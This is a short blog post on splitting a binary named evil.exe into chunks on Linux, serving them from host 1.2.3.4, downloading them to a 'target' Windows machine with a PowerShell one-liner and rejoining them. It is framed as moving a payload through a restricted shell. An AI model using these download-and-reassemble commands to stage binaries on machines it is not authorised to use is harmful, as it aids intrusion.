Splitting a binary into chunks on Linux, and re-combining them on Windows

1 minute read

Recently, I needed to transfer a binary over a very limited network connection allowing only small packets to be sent. I ended up splitting the binary into pieces on my Linux box and reassembled the pieces on the target Windows host.

If, for some reason, you cannot use easier means like IP fragmentation and work with a smaller maximum transfer unit (MTU), here’s how to do the splitting and re-combining.

Split binary into pieces on Linux

Splitting a file into pieces on Linux is very straightforward – just use the split program (man).

The following command will split evil.exe into pieces of 1000 bytes, prefix them with chunk and use a numeric suffix for each chunk.

split -b 1000 -d evil.exe chunk

So we will end up with something like this:

chunk00  chunk16  chunk32  chunk48
chunk01  chunk17  chunk33  chunk49
chunk02  chunk18  chunk34  chunk50
chunk03  chunk19  chunk35  chunk51
chunk04  chunk20  chunk36  chunk52
chunk05  chunk21  chunk37  chunk53
chunk06  chunk22  chunk38  chunk54
chunk07  chunk23  chunk39  chunk55
chunk08  chunk24  chunk40  chunk56
chunk09  chunk25  chunk41  chunk57
chunk10  chunk26  chunk42  chunk58
chunk11  chunk27  chunk43  chunk59
chunk12  chunk28  chunk44
chunk13  chunk29  chunk45
chunk14  chunk30  chunk46
chunk15  chunk31  chunk47

Now that we have our chunks, we can host them for the Windows machine to download.

Download from Windows

To download the individual chunks to the Windows host, let’s use a quick PowerShell one-liner with Invoke-WebRequest:

0..59 | % { $chunk = 'chunk{0:d2}' -f $_; iwr 1.2.3.4/$chunk -outfile $chunk } 

If all you have is a command prompt and cannot download the chunks directly, one idea is to convert the binary chunks into hex strings and then send these strings through the prompt of the shell you might have.

Combine the chunks

Now that we have all pieces to the puzzle, let’s assemble them into the self-contained binary we actually want, with Get-ChildItem, Get-Content and Set-Content:

gci -Filter "chunk*" | gc -Enc Byte -Read 1000 | sc evil.exe -Enc Byte 

Doing a Get-FileHash evil.exe on the Windows host should now return the same hash as shasum -a 256 evil.exe on Linux.

Like to comment? Feel free to send me an email or reach out on Twitter.